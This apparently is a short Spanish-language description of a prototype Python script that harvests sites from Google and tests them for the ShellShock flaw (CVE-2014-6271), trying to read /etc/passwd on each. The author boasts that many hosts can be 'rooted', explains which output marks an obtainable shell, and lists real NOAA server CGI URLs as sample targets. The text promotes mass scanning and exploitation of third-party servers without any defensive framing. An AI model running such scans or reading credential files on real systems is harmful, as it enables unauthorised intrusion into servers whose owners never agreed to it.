
Usando Google para escanear sitios en busca de "ShellShock" (CVE-2014-6271)
sudo pip install shellUso Google para buscar en los primeros 1000 sitios e intento obtener /etc/passwd.
Después de probar, ¡hay muchísimos hosts que pueden ser rooteados!!!!
Por cierto, esto es solo un prototipo, tiene falsos positivos.
Salida similar a esta:
si el segundo campo es !!!, ¡entonces puedes obtener SHELL!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir